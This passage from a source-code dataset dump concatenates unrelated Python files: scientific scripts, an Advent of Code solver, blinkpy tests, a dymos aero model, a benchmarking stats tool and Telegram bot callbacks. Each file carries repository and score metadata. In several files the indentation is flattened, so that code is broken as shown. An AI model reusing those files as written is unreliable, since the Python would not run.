# if sem_cls < 0: continue # ignore non-valid class object (only preserve CARED classes)
instance_vertices[vert_choices] = k # (0~K-1) NOTE:unannotated=-1
semantic_vertices[vert_choices] = sem_cls # (0~num_classes-1) NOTE:unannotated=-1
# error check
ins_list = np.unique(instance_vertices)
if (np.max(instance_vertices)+1) != (len(ins_list)-1):
print_log(f"[{index}/{N} Error] Please check this scene --> {id_scan}")
error_scan[id_scan] = 0
continue
# DUMP COLLECT RESULTS
if dump:
scene_path = os.path.join(collect_path, f'{id_scan}')
if not os.path.exists(scene_path):
os.mkdir(scene_path)
print("Created scene directory: {}".format(scene_path))
s2c_utils.write_scene_results(points=point_cloud, ins_points=instance_vertices, num_instances=K, bboxes=None, file_path=scene_path)
point_cloud = np.ascontiguousarray(point_cloud[:, :3] - point_cloud[:, :3].mean(0))
pcoord = point_cloud.astype(np.float64)
colors = colors.astype(np.float32)
sem_labels = semantic_vertices.astype(np.float64)
ins_labels = instance_vertices.astype(np.float64)
# ============ DUMP ============
# scene data
file_path = os.path.join(self.out_path, id_scan+'_inst.pth')
torch.save((pcoord, colors, sem_labels, ins_labels), file_path)
print(f"[{index}/{N} Saved] {id_scan} >>> {file_path}")
# error scan
with open(self.out_path+'/error_scan.txt', 'w') as f:
print_log("ERROR SCAN")
for i, sname in enumerate(error_scan.keys()):
print('{:2d}: {}'.format(i, sname))
f.write(sname)
f.write('\n')
if __name__ == "__main__":
Dataset = Scan2CADCollect(split_set='all', distr_check=True)
N = len(Dataset)
Dataset.collect(N, dump=False) | 1.789063 | 2 |
nappy/msd2diff.py | ryokbys/nap | 27 | 5528 | #!/usr/bin/env python
"""
Compute diffusion coefficient from MSD data.
Time interval, DT, is obtained from in.pmd in the same directory.
Usage:
msd2diff.py [options] MSD_FILE
Options:
-h, --help Show this message and exit.
-o, --offset OFFSET
Offset of given data. [default: 0]
--plot Plot a fitted graph. [default: False]
"""
from __future__ import print_function
import os,sys
from docopt import docopt
import numpy as np
__author__ = "<NAME>"
__version__ = "191212"
def read_out_msd(fname='out.msd',offset=0,specorder=[],spc=None):
if specorder == [] or spc not in specorder:
index = 1
else:
index = specorder.index(spc) +1
with open(fname,'r') as f:
lines = f.readlines()
try:
dname = os.path.dirname(fname)
dt = dt_from_inpmd(fname=dname+'/in.pmd')
except Exception as e:
raise RuntimeError('Failed to read in.pmd.')
ts = []
msds = []
n0 = 0
msd0 = 0.0
for il,line in enumerate(lines):
if line[0] == '#':
continue
data = line.split()
if il < offset:
n0 = int(data[0])
msd0 = float(data[index])
continue
n = int(data[0])
msd = float(data[index])
ts.append((n-n0)*dt)
msds.append(msd-msd0)
return np.array(ts),np.array(msds)
def dt_from_inpmd(fname='in.pmd'):
with open(fname,'r') as f:
lines = f.readlines()
for line in lines:
if 'time_interval' in line:
time_interval = abs(float(line.split()[1]))
elif 'num_iteration' in line:
num_iteration = int(line.split()[1])
elif 'num_out_pos' in line or 'num_out_pmd' in line:
num_out_pos = int(line.split()[1])
return time_interval*num_iteration/num_out_pos
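# Worked example (illustrative, assuming a hypothetical in.pmd): with time_interval = 2.0 fs,
# num_iteration = 1000 and num_out_pos = 100, the spacing between successive MSD records is
# 2.0 * 1000 / 100 = 20.0 fs.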
def msd2D(ts,msds,fac,dim=3):
"""
Compute diffusion coefficient from time [fs] vs MSD [Ang^2] data
    by solving a least-squares problem using numpy.
Return diffusion coefficient multiplied by FAC.
"""
A= np.array([ts, np.ones(len(ts))])
A = A.T
xvar = np.var(A[:,0])
p,res,_,_ = np.linalg.lstsq(A,msds,rcond=None)
a = p[0]
b = p[1]
# fac = 1.0e-16 /1.e-15
a = a *fac /(2.0*dim)
b = b *fac
# print(res[0],xvar,np.mean(A[:,0]),len(ts))
std = np.sqrt(res[0]/len(ts)/xvar) *fac /(2.0*dim)
return a,b,std
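# Hedged self-check (added; not part of the original tool): fit synthetic, perfectly linear MSD
# data with a known slope and confirm msd2D recovers it. With fac = 1 and dim = 3 the returned
# `a` equals slope / 6, so a slope of 0.6 A^2/fs should give a ~= 0.1. Never called by the script.
def _demo_msd2D():
    ts = np.linspace(0.0, 100.0, 101)
    msds = 0.6 * ts  # zero intercept, exact linear relation
    a, b, std = msd2D(ts, msds, fac=1.0, dim=3)
    assert abs(a - 0.1) < 1.0e-6 and abs(b) < 1.0e-6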
if __name__ == "__main__":
args = docopt(__doc__)
fname = args['MSD_FILE']
offset = int(args['--offset'])
plot = args['--plot']
ts,msds = read_out_msd(fname,offset)
#...Assuming input MSD unit in A^2/fs and output in cm^2/s
fac = 1.0e-16 /1.0e-15
#...Least square
a,b,std = msd2D(ts,msds,fac)
print(' Diffusion coefficient = {0:12.4e}'.format(a)+
' +/- {0:12.4e} [cm^2/s]'.format(std))
if plot:
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(context='talk',style='ticks')
#...Original time unit == fs
unit = 'fs'
tfac = 1.0
if ts[-1] > 1.0e+5: #...if max t > 100ps, time unit in ps
unit = 'ps'
tfac = 1.0e-3
plt.xlabel('Time ({0:s})'.format(unit))
plt.ylabel('MSD (A^2/{0:s})'.format(unit))
fvals = np.array([ (t*a+b)/fac for t in ts ])
plt.plot(ts*tfac,msds/tfac,'b-',label='MSD data')
plt.plot(ts*tfac,fvals/tfac,'r-',label='Fitted curve')
plt.savefig("graph_msd2D.png", format='png',
dpi=300, bbox_inches='tight')
print(' Wrote graph_msd2D.png')
| 2.609375 | 3 |
5/part2.py | jcsesznegi/advent-of-code-2017 | 1 | 5529 | <filename>5/part2.py<gh_stars>1-10
import os
f = open(os.path.join(os.path.dirname(__file__), '../input/5/part2.txt'), 'r')
class InstructionSet:
def __init__(self, instructions):
self.instructions = instructions
self.currentIndex = 0
self.numberSteps = 0
def _changeOffsetValue(self, index):
if self.instructions[index] >= 3:
self.instructions[index] -= 1
else:
self.instructions[index] += 1
def jump(self):
self.numberSteps += 1
jumpNumber = self.instructions[self.currentIndex]
oldIndex = self.currentIndex
self.currentIndex += jumpNumber
self._changeOffsetValue(oldIndex)
def run(self):
while (self.currentIndex >= 0
and self.currentIndex < len(self.instructions)):
self.jump()
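# Quick illustration (added; the sample offsets come from the Advent of Code puzzle statement,
# and the step count is what these part-two jump rules produce for them):
#   s = InstructionSet([0, 3, 0, 1, -3]); s.run(); s.numberSteps  ->  10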
def main():
def formatLine(line):
return int(line.rstrip())
line = f.readline()
instructions = []
while line:
instructions.append(formatLine(line))
line = f.readline()
instructionSet = InstructionSet(instructions)
instructionSet.run()
print(instructionSet.numberSteps)
if __name__ == '__main__':
main()
| 3.328125 | 3 |
features/steps/basic_account_add_bdd.py | MhmdRyhn/behavior_test | 0 | 5530 | <reponame>MhmdRyhn/behavior_test
import behave
@behave.when('I add $1200 to my account')
def add_usd_1200(context):
context.account.add_cash(amount=1200)
@behave.then('It becomes $3200 in my account')
def check_for_increase_to_usd_3200(context):
assert context.account.current_cash == 3200
| 2.84375 | 3 |
tests/test_sync_module.py | naveengh6/blinkpy | 272 | 5531 | <reponame>naveengh6/blinkpy
"""Tests camera and system functions."""
import unittest
from unittest import mock
from blinkpy.blinkpy import Blink
from blinkpy.helpers.util import BlinkURLHandler
from blinkpy.sync_module import BlinkSyncModule, BlinkOwl
from blinkpy.camera import BlinkCamera, BlinkCameraMini
@mock.patch("blinkpy.auth.Auth.query")
class TestBlinkSyncModule(unittest.TestCase):
"""Test BlinkSyncModule functions in blinkpy."""
def setUp(self):
"""Set up Blink module."""
self.blink = Blink(motion_interval=0)
self.blink.last_refresh = 0
self.blink.urls = BlinkURLHandler("test")
self.blink.sync["test"] = BlinkSyncModule(self.blink, "test", "1234", [])
self.camera = BlinkCamera(self.blink.sync)
self.mock_start = [
{
"syncmodule": {
"id": 1234,
"network_id": 5678,
"serial": "12345678",
"status": "foobar",
}
},
{"event": True},
{},
{},
None,
{"devicestatus": {}},
]
self.blink.sync["test"].network_info = {"network": {"armed": True}}
def tearDown(self):
"""Clean up after test."""
self.blink = None
self.camera = None
self.mock_start = None
def test_bad_status(self, mock_resp):
"""Check that we mark module unavaiable on bad status."""
self.blink.sync["test"].status = None
self.blink.sync["test"].available = True
self.assertFalse(self.blink.sync["test"].online)
self.assertFalse(self.blink.sync["test"].available)
def test_bad_arm(self, mock_resp):
"""Check that we mark module unavaiable if bad arm status."""
self.blink.sync["test"].network_info = None
self.blink.sync["test"].available = True
self.assertEqual(self.blink.sync["test"].arm, None)
self.assertFalse(self.blink.sync["test"].available)
self.blink.sync["test"].network_info = {}
self.blink.sync["test"].available = True
self.assertEqual(self.blink.sync["test"].arm, None)
self.assertFalse(self.blink.sync["test"].available)
def test_get_events(self, mock_resp):
"""Test get events function."""
mock_resp.return_value = {"event": True}
self.assertEqual(self.blink.sync["test"].get_events(), True)
def test_get_events_fail(self, mock_resp):
"""Test handling of failed get events function."""
mock_resp.return_value = None
self.assertFalse(self.blink.sync["test"].get_events())
mock_resp.return_value = {}
self.assertFalse(self.blink.sync["test"].get_events())
def test_get_camera_info(self, mock_resp):
"""Test get camera info function."""
mock_resp.return_value = {"camera": ["foobar"]}
self.assertEqual(self.blink.sync["test"].get_camera_info("1234"), "foobar")
def test_get_camera_info_fail(self, mock_resp):
"""Test handling of failed get camera info function."""
mock_resp.return_value = None
self.assertEqual(self.blink.sync["test"].get_camera_info("1"), {})
mock_resp.return_value = {}
self.assertEqual(self.blink.sync["test"].get_camera_info("1"), {})
mock_resp.return_value = {"camera": None}
self.assertEqual(self.blink.sync["test"].get_camera_info("1"), {})
def test_get_network_info(self, mock_resp):
"""Test network retrieval."""
mock_resp.return_value = {"network": {"sync_module_error": False}}
self.assertTrue(self.blink.sync["test"].get_network_info())
mock_resp.return_value = {"network": {"sync_module_error": True}}
self.assertFalse(self.blink.sync["test"].get_network_info())
def test_get_network_info_failure(self, mock_resp):
"""Test failed network retrieval."""
mock_resp.return_value = {}
self.blink.sync["test"].available = True
self.assertFalse(self.blink.sync["test"].get_network_info())
self.assertFalse(self.blink.sync["test"].available)
self.blink.sync["test"].available = True
mock_resp.return_value = None
self.assertFalse(self.blink.sync["test"].get_network_info())
self.assertFalse(self.blink.sync["test"].available)
def test_check_new_videos_startup(self, mock_resp):
"""Test that check_new_videos does not block startup."""
sync_module = self.blink.sync["test"]
self.blink.last_refresh = None
self.assertFalse(sync_module.check_new_videos())
def test_check_new_videos(self, mock_resp):
"""Test recent video response."""
mock_resp.return_value = {
"media": [
{
"device_name": "foo",
"media": "/foo/bar.mp4",
"created_at": "1990-01-01T00:00:00+00:00",
}
]
}
sync_module = self.blink.sync["test"]
sync_module.cameras = {"foo": None}
sync_module.blink.last_refresh = 0
self.assertEqual(sync_module.motion, {})
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(
sync_module.last_record["foo"],
{"clip": "/foo/bar.mp4", "time": "1990-01-01T00:00:00+00:00"},
)
self.assertEqual(sync_module.motion, {"foo": True})
mock_resp.return_value = {"media": []}
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(sync_module.motion, {"foo": False})
self.assertEqual(
sync_module.last_record["foo"],
{"clip": "/foo/bar.mp4", "time": "1990-01-01T00:00:00+00:00"},
)
def test_check_new_videos_old_date(self, mock_resp):
"""Test videos return response with old date."""
mock_resp.return_value = {
"media": [
{
"device_name": "foo",
"media": "/foo/bar.mp4",
"created_at": "1970-01-01T00:00:00+00:00",
}
]
}
sync_module = self.blink.sync["test"]
sync_module.cameras = {"foo": None}
sync_module.blink.last_refresh = 1000
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(sync_module.motion, {"foo": False})
def test_check_no_motion_if_not_armed(self, mock_resp):
"""Test that motion detection is not set if module unarmed."""
mock_resp.return_value = {
"media": [
{
"device_name": "foo",
"media": "/foo/bar.mp4",
"created_at": "1990-01-01T00:00:00+00:00",
}
]
}
sync_module = self.blink.sync["test"]
sync_module.cameras = {"foo": None}
sync_module.blink.last_refresh = 1000
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(sync_module.motion, {"foo": True})
sync_module.network_info = {"network": {"armed": False}}
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(sync_module.motion, {"foo": False})
def test_check_multiple_videos(self, mock_resp):
"""Test motion found even with multiple videos."""
mock_resp.return_value = {
"media": [
{
"device_name": "foo",
"media": "/foo/bar.mp4",
"created_at": "1970-01-01T00:00:00+00:00",
},
{
"device_name": "foo",
"media": "/bar/foo.mp4",
"created_at": "1990-01-01T00:00:00+00:00",
},
{
"device_name": "foo",
"media": "/foobar.mp4",
"created_at": "1970-01-01T00:00:01+00:00",
},
]
}
sync_module = self.blink.sync["test"]
sync_module.cameras = {"foo": None}
sync_module.blink.last_refresh = 1000
self.assertTrue(sync_module.check_new_videos())
self.assertEqual(sync_module.motion, {"foo": True})
expected_result = {
"foo": {"clip": "/bar/foo.mp4", "time": "1990-01-01T00:00:00+00:00"}
}
self.assertEqual(sync_module.last_record, expected_result)
def test_check_new_videos_failed(self, mock_resp):
"""Test method when response is unexpected."""
mock_resp.side_effect = [None, "just a string", {}]
sync_module = self.blink.sync["test"]
sync_module.cameras = {"foo": None}
sync_module.motion["foo"] = True
self.assertFalse(sync_module.check_new_videos())
self.assertFalse(sync_module.motion["foo"])
sync_module.motion["foo"] = True
self.assertFalse(sync_module.check_new_videos())
self.assertFalse(sync_module.motion["foo"])
sync_module.motion["foo"] = True
self.assertFalse(sync_module.check_new_videos())
self.assertFalse(sync_module.motion["foo"])
def test_sync_start(self, mock_resp):
"""Test sync start function."""
mock_resp.side_effect = self.mock_start
self.blink.sync["test"].start()
self.assertEqual(self.blink.sync["test"].name, "test")
self.assertEqual(self.blink.sync["test"].sync_id, 1234)
self.assertEqual(self.blink.sync["test"].network_id, 5678)
self.assertEqual(self.blink.sync["test"].serial, "12345678")
self.assertEqual(self.blink.sync["test"].status, "foobar")
def test_unexpected_summary(self, mock_resp):
"""Test unexpected summary response."""
self.mock_start[0] = None
mock_resp.side_effect = self.mock_start
self.assertFalse(self.blink.sync["test"].start())
def test_summary_with_no_network_id(self, mock_resp):
"""Test handling of bad summary."""
self.mock_start[0]["syncmodule"] = None
mock_resp.side_effect = self.mock_start
self.assertFalse(self.blink.sync["test"].start())
def test_summary_with_only_network_id(self, mock_resp):
"""Test handling of sparse summary."""
self.mock_start[0]["syncmodule"] = {"network_id": 8675309}
mock_resp.side_effect = self.mock_start
self.blink.sync["test"].start()
self.assertEqual(self.blink.sync["test"].network_id, 8675309)
def test_unexpected_camera_info(self, mock_resp):
"""Test unexpected camera info response."""
self.blink.sync["test"].cameras["foo"] = None
self.mock_start[5] = None
mock_resp.side_effect = self.mock_start
self.blink.sync["test"].start()
self.assertEqual(self.blink.sync["test"].cameras, {"foo": None})
def test_missing_camera_info(self, mock_resp):
"""Test missing key from camera info response."""
self.blink.sync["test"].cameras["foo"] = None
self.mock_start[5] = {}
self.blink.sync["test"].start()
self.assertEqual(self.blink.sync["test"].cameras, {"foo": None})
def test_sync_attributes(self, mock_resp):
"""Test sync attributes."""
self.assertEqual(self.blink.sync["test"].attributes["name"], "test")
self.assertEqual(self.blink.sync["test"].attributes["network_id"], "1234")
def test_owl_start(self, mock_resp):
"""Test owl camera instantiation."""
response = {
"name": "foo",
"id": 2,
"serial": "foobar123",
"enabled": True,
"network_id": 1,
"thumbnail": "/foo/bar",
}
self.blink.last_refresh = None
self.blink.homescreen = {"owls": [response]}
owl = BlinkOwl(self.blink, "foo", 1234, response)
self.assertTrue(owl.start())
self.assertTrue("foo" in owl.cameras)
self.assertEqual(owl.cameras["foo"].__class__, BlinkCameraMini)
| 2.578125 | 3 |
dymos/examples/min_time_climb/aero/aero.py | naylor-b/dymos | 0 | 5532 | from __future__ import absolute_import
import numpy as np
from openmdao.api import Group
from .dynamic_pressure_comp import DynamicPressureComp
from .lift_drag_force_comp import LiftDragForceComp
from .cd0_comp import CD0Comp
from .kappa_comp import KappaComp
from .cla_comp import CLaComp
from .cl_comp import CLComp
from .cd_comp import CDComp
from .mach_comp import MachComp
class AeroGroup(Group):
"""
The purpose of the AeroGroup is to compute the aerodynamic forces on the
aircraft in the body frame.
Parameters
----------
v : float
air-relative velocity (m/s)
sos : float
local speed of sound (m/s)
rho : float
atmospheric density (kg/m**3)
alpha : float
angle of attack (rad)
S : float
aerodynamic reference area (m**2)
"""
def initialize(self):
self.options.declare('num_nodes', types=int,
desc='Number of nodes to be evaluated in the RHS')
def setup(self):
nn = self.options['num_nodes']
self.add_subsystem(name='mach_comp',
subsys=MachComp(num_nodes=nn),
promotes_inputs=['v', 'sos'],
promotes_outputs=['mach'])
self.add_subsystem(name='cd0_comp',
subsys=CD0Comp(num_nodes=nn),
promotes_inputs=['mach'],
promotes_outputs=['CD0'])
self.add_subsystem(name='kappa_comp',
subsys=KappaComp(num_nodes=nn),
promotes_inputs=['mach'],
promotes_outputs=['kappa'])
self.add_subsystem(name='cla_comp',
subsys=CLaComp(num_nodes=nn),
promotes_inputs=['mach'],
promotes_outputs=['CLa'])
self.add_subsystem(name='CL_comp',
subsys=CLComp(num_nodes=nn),
promotes_inputs=['alpha', 'CLa'],
promotes_outputs=['CL'])
self.add_subsystem(name='CD_comp',
subsys=CDComp(num_nodes=nn),
promotes_inputs=['CD0', 'alpha', 'CLa', 'kappa'],
promotes_outputs=['CD'])
self.add_subsystem(name='q_comp',
subsys=DynamicPressureComp(num_nodes=nn),
promotes_inputs=['rho', 'v'],
promotes_outputs=['q'])
self.add_subsystem(name='lift_drag_force_comp',
subsys=LiftDragForceComp(num_nodes=nn),
promotes_inputs=['CL', 'CD', 'q', 'S'],
promotes_outputs=['f_lift', 'f_drag'])
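# Hedged usage sketch (added for illustration; `n` and the exact wiring are assumptions, and the
# real dymos examples may set this up differently): the group is meant to be dropped into a larger
# OpenMDAO model and fed `v`, `sos`, `rho`, `alpha` and `S` at each of the `n` nodes, e.g.
#
#   from openmdao.api import Problem
#   prob = Problem()
#   prob.model.add_subsystem('aero', AeroGroup(num_nodes=n), promotes=['*'])
#   prob.setup()
#   # ...assign the promoted inputs, then:
#   prob.run_model()  # exposes the promoted outputs 'f_lift' and 'f_drag'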
| 2.3125 | 2 |
stats.py | jakeb1996/SBS | 0 | 5533 | import matplotlib.pyplot as plt
import argparse, csv, numpy, time, os, re
def main(resultsFile, toolName):
filesToCalc = []
toolNames = []
if os.path.isfile(resultsFile):
# the user must have defined an exact file to plot
filesToCalc.append(resultsFile)
toolNames.append(toolName)
else:
# check if there are multiple files matching the criteria
dir = (os.sep).join(resultsFile.split(os.sep)[:-1])
fileNameStart = resultsFile.split(os.sep)[-1]
for (dirpath, dirnames, filenames) in os.walk(dir):
for filename in filenames:
reMatch = re.search('%s_((aggregate|system)|(\d)+)\\b' % fileNameStart, filename)
if bool(reMatch):
filesToCalc.append(os.path.join(dirpath, filename))
toolNames.append('%s %s' %(toolName, reMatch.group(1).title()))
# start plotting
i = 0
while i < len(filesToCalc):
stat(filesToCalc[i], toolNames[i])
i = i + 1
def stat(resultsFile, toolName):
print 'Running for: %s\n' % toolName
TIME_ELAPSED = []
TIME_GAPS = []
config = {
'data-type-default' : int
}
# the aggregate functions to perform on each set. each is a function name.
# user-defined functions at bottom of file
stats = [len, min, q1, median, mean, q3, max, std]
measurements = {
# measurement configurations must appear in the order of the associated CSV columns
# --- sample ---
# 'stat_name' : {
# ['data-type' : float,]
# 'data' : [],
# 'title' : 'measurement title'
# },
# --- end sample ---
### START CHILD PROCESS STATS ###
'time' : {
'data' : [],
'data-type' : float,
'title' : 'Time'
},
'num_threads' : {
'data' : [],
'title' : 'Number of Threads'
},
'cpu_percent' : {
'data' : [],
'data-type' : float,
'title' : 'CPU Utilisation'
},
'mem_rss' : {
'data' : [],
'data-type' : float,
'title' : 'Resident Set Size (RSS) Memory Utilisation'
},
'mem_vms' : {
'data' : [],
'title' : 'Virtual Memory Size (VMS) Memory Utilisation'
},
'io_read_count' : {
'data' : [],
'title' : 'Disk IO Read Count'
},
'io_read_bytes' : {
'data' : [],
'title' : 'Disk IO Read Volume'
},
'io_write_count' : {
'data' : [],
'title' : 'Disk IO Write Count'
},
'io_write_bytes' : {
'data' : [],
'title' : 'Disk IO Write Volume'
},
'child_process_count' : {
'data' : [],
'title' : 'Child Process Count'
},
### START SYSTEM STATS ###
# if the stat was defined above, then don't define it again
'mem_used' : {
'data' : [],
'data-type' : float,
'title' : 'Physical Memory Used (megabytes)'
},
'mem_avai' : {
'data' : [],
'data-type' : float,
'title' : 'Physical Memory Available (megabytes)',
},
'process_count' : {
'data' : [],
'title' : 'Process Count'
}
}
# due to dictionaries not being in order, we need to know the order the data appears and
# match it with the associated plot configuration above.
headerOrder = []
# put all the times in a list
timeRecords = []
with open(resultsFile, 'r') as fcsv:
dataCsv = csv.reader(fcsv, delimiter=',')
# Set the headerOrder and remove the time column header
headerOrder = dataCsv.next()
firstTime = None
for row in dataCsv:
# Elapsed time
timeRecords.append(float(row[0]))
TIME_ELAPSED.append(float(row[0]) - float(timeRecords[0]))
if firstTime == False:
TIME_GAPS.append(float(row[0]) - measurements['time']['data'][-1])
i = 0 # skip zero as its the time (as above)
for measurement in headerOrder:
if 'data-type' in measurements[measurement]:
measurements[measurement]['data'].append(measurements[measurement]['data-type'](row[i]))
else:
measurements[measurement]['data'].append(config['data-type-default'](row[i]))
i += 1
firstTime = False
if len(timeRecords) == 0:
print 'No data recorded in %s.\nExiting.\n\n' % resultsFile
return 0
resultsFileName = '%s_stats.csv' % resultsFile
with open(resultsFileName, 'w') as scsv:
print 'Writing to file: %s' % resultsFileName
# write headers line
scsv.write('measurement,%s\n' % ','.join(map(funcName, stats)))
for measurement in headerOrder:
line = '%s' % measurement
for stat in stats:
line = ('%s,%s' % (line, stat(measurements[measurement]['data'])))
scsv.write('%s\n' % line)
        # now, because the time gaps were calculated separately, run the stats on them too
# messy, I know. sorry!
line = '%s' % 'time_gaps'
for stat in stats:
line = ('%s,%s' % (line, stat(TIME_GAPS)))
scsv.write('%s\n' % line)
# write start and end time
scsv.write('start_time,%s,"%s"\nend_time,%s,"%s"\ntime_elapsed,%s,sec,%s,min' % (timeRecords[0], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(timeRecords[0])), timeRecords[-1], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(timeRecords[-1])), (timeRecords[-1] - timeRecords[0]), ((timeRecords[-1] - timeRecords[0]) / 60)))
print '\nFinished.'
def q1(seq):
return numpy.percentile(seq, 25)
def median(seq):
return numpy.percentile(seq, 50)
def mean(seq):
return sum(seq) / len(seq)
def q3(seq):
return numpy.percentile(seq, 75)
def std(seq):
return numpy.std(seq)
def funcName(func):
return func.__name__
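# Illustrative note (added): with the default `stats` list defined in stat() above, the header row
# written to the stats CSV comes out as
#   measurement,len,min,q1,median,mean,q3,max,std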
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = 'Plotter for the Software Benchmarking Script')
parser.add_argument('-f', help='Results file as input (in csv format)')
parser.add_argument('-t', help='Name of tool', default=None)
parser.add_argument('--wincntxmnu', help='Indicates SBS stats was launched from the Windows context menu. See README for help.', action='store_true')
args = parser.parse_args()
# Not used
#if args.wincntxmnu:
# args.t = raw_input('Enter the plot prefix: ')
main(args.f, args.t)
| 2.859375 | 3 |
callback_handlers.py | andrey18106/vocabulary_bot | 0 | 5534 | <filename>callback_handlers.py
# -*- coding: utf-8 -*-
# ===== Default imports =====
import asyncio
import logging
# ===== External libs imports =====
from aiogram import Bot, Dispatcher, types
from aiogram.dispatcher import FSMContext
# ===== Local imports =====
from analytics import BotAnalytics
from db_manager import DbManager
from lang_manager import LangManager
from markups_manager import MarkupManager
from states.Dictionary import DictionaryQuizState, DictionaryState, DictionaryEditWordState, DictionarySearchWordState
from states.Mailing import AdminMailingState
import pagination
class VocabularyBotCallbackHandler:
"""Class for Vocabulary Bot callback handlers"""
def __init__(self, db_manager: DbManager, lang_manager: LangManager, markup_manager: MarkupManager,
analytics: BotAnalytics, dispatcher: Dispatcher, bot: Bot):
self.db = db_manager
self.lang = lang_manager
self.markup = markup_manager
self.analytics = analytics
self.dp = dispatcher
self.bot = bot
self.__init_handlers()
def __init_handlers(self):
# CALLBACK HANDLER FOR USER LANGUAGE SETTINGS
@self.dp.callback_query_handler(lambda query: query.data.startswith('lang_setting_'))
@self.analytics.callback_metric
async def language_settings_callback_handler(query: types.CallbackQuery):
"""Handle selecting preferred interface language"""
user_lang = self.lang.parse_user_lang(query['from']['id'])
selected_lang = query['data'][-2:]
if selected_lang != user_lang:
self.db.set_user_lang(query['from']['id'], selected_lang)
await query.message.delete()
await query.message.answer(text=self.lang.get_page_text('LANG_SETTINGS', 'SUCCESS', selected_lang),
reply_markup=self.markup.get_main_menu_markup(selected_lang))
await query.answer()
else:
await query.answer(self.lang.get_page_text('LANG_SETTINGS', 'ERROR', user_lang), show_alert=True)
@self.dp.callback_query_handler(lambda query: query.data.startswith('help_question_'))
@self.analytics.callback_metric
async def help_callback_handler(query: types.CallbackQuery):
"""Handle HELP page question buttons"""
user_id = query['from']['id']
user_lang = self.lang.parse_user_lang(user_id)
question = query['data']
await query.message.edit_text(self.lang.get_page_text("HELP", question, user_lang))
await query.message.edit_reply_markup(self.markup.get_help_back_markup(user_lang))
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data == 'back_to_help')
@self.analytics.callback_metric
async def back_to_help_callback_handler(query: types.CallbackQuery):
"""Handle HELP page question back button"""
user_id = query['from']['id']
user_lang = self.lang.parse_user_lang(user_id)
await query.message.edit_text(self.lang.get_page_text("HELP", "TEXT", user_lang))
await query.message.edit_reply_markup(self.markup.get_help_markup(user_lang))
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('settings_'))
@self.analytics.callback_metric
async def settings_page_callback_handler(query: types.CallbackQuery):
"""Handle SETTINGS page buttons"""
user_id = query['from']['id']
user_lang = self.lang.parse_user_lang(user_id)
page = query['data'][9:]
if page == 'interface':
await query.message.edit_text(self.lang.get_page_text("LANG_SETTINGS", "TEXT", user_lang))
await query.message.edit_reply_markup(self.markup.get_lang_settings_markup(user_lang))
await query.answer()
elif page == 'newsletters':
await query.message.edit_text(self.lang.get_page_text("NEWSLETTER_SETTINGS", "TEXT", user_lang))
await query.message.edit_reply_markup(self.markup.get_news_settings_markup(user_lang))
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('news_setting_'))
@self.analytics.callback_metric
async def language_settings_callback_handler(query: types.CallbackQuery):
"""Newsletters settings"""
user_lang = self.lang.parse_user_lang(query['from']['id'])
selected_option = query['data'][13:]
user_mailings = self.db.get_user_mailings(query['from']['id'])
mailings_settings = ['disable', 'important', 'all']
if mailings_settings[user_mailings] != selected_option:
if selected_option == 'all' and user_mailings != 2:
self.db.set_user_mailings(query['from']['id'], 2)
elif selected_option == 'important' and user_mailings != 1:
self.db.set_user_mailings(query['from']['id'], 1)
elif selected_option == 'disable' and user_mailings != 0:
self.db.set_user_mailings(query['from']['id'], 0)
await query.message.delete()
await query.message.answer(self.lang.get_page_text("NEWSLETTER_SETTINGS", "SUCCESS", user_lang))
else:
await query.answer(self.lang.get_page_text('NEWSLETTER_SETTINGS', 'ALREADY_SET', user_lang),
show_alert=True)
async def _send_dictionary_page(message: types.Message, user_id: int, user_lang: str, from_lang: str,
to_lang: str, state: FSMContext):
current_state = {
'current_page': 0,
'from_lang': from_lang,
'to_lang': to_lang
}
paginator = getattr(pagination, 'dictionary'.capitalize() + 'Paginator')(self.lang, self.db, self.markup,
user_id,
current_page=current_state)
await message.answer(text=self.lang.get_page_text('DICTIONARY', 'TEXT', user_lang),
reply_markup=self.markup.get_dictionary_markup(user_lang))
await message.answer(text=paginator.first_page(user_lang), reply_markup=paginator.get_reply_markup())
async with state.proxy() as data:
data['curr_pagination_page'] = current_state
await DictionaryState.dictionary.set()
@self.dp.callback_query_handler(lambda query: query.data.startswith('dictionary_'), state="*")
@self.analytics.callback_fsm_metric
async def dictionary_list_callback_handler(query: types.CallbackQuery, state: FSMContext):
user_lang = self.lang.parse_user_lang(query['from']['id'])
selected_dict_pairs = query.data[11:].split('_')
from_lang = selected_dict_pairs[0]
to_lang = selected_dict_pairs[1]
await query.message.delete()
await _send_dictionary_page(query.message, query['from']['id'], user_lang, from_lang, to_lang, state)
# PAGINATION
@self.dp.callback_query_handler(lambda query: query.data.startswith('first_'), state="*")
@self.analytics.callback_fsm_metric
async def pagination_first_callback_handler(query: types.CallbackQuery, state: FSMContext):
action = query.data[6:]
user_lang = self.lang.parse_user_lang(query['from']['id'])
async with state.proxy() as data:
if 'curr_pagination_page' in data:
current_page = data['curr_pagination_page']
paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup,
query['from']['id'],
current_page=current_page)
if not paginator.is_first():
await query.message.edit_text(text=paginator.first_page(user_lang),
reply_markup=paginator.get_reply_markup(),
parse_mode=paginator.get_parse_mode())
data['curr_pagination_page'] = paginator.get_state_data()
else:
await query.answer(self.lang.get_page_text('PAGINATION', 'FIRST_REACHED', user_lang),
show_alert=True)
logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.')
await query.answer()
@self.dp.callback_query_handler(lambda query: query.data.startswith('prev_'), state="*")
@self.analytics.callback_fsm_metric
async def pagination_prev_callback_handler(query: types.CallbackQuery, state: FSMContext):
action = query.data[5:]
user_lang = self.lang.parse_user_lang(query['from']['id'])
async with state.proxy() as data:
if 'curr_pagination_page' in data:
current_page = data['curr_pagination_page']
paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup,
query['from']['id'],
current_page=current_page)
if not paginator.is_first():
await query.message.edit_text(text=paginator.prev_page(user_lang),
reply_markup=paginator.get_reply_markup(),
parse_mode=paginator.get_parse_mode())
data['curr_pagination_page'] = paginator.get_state_data()
else:
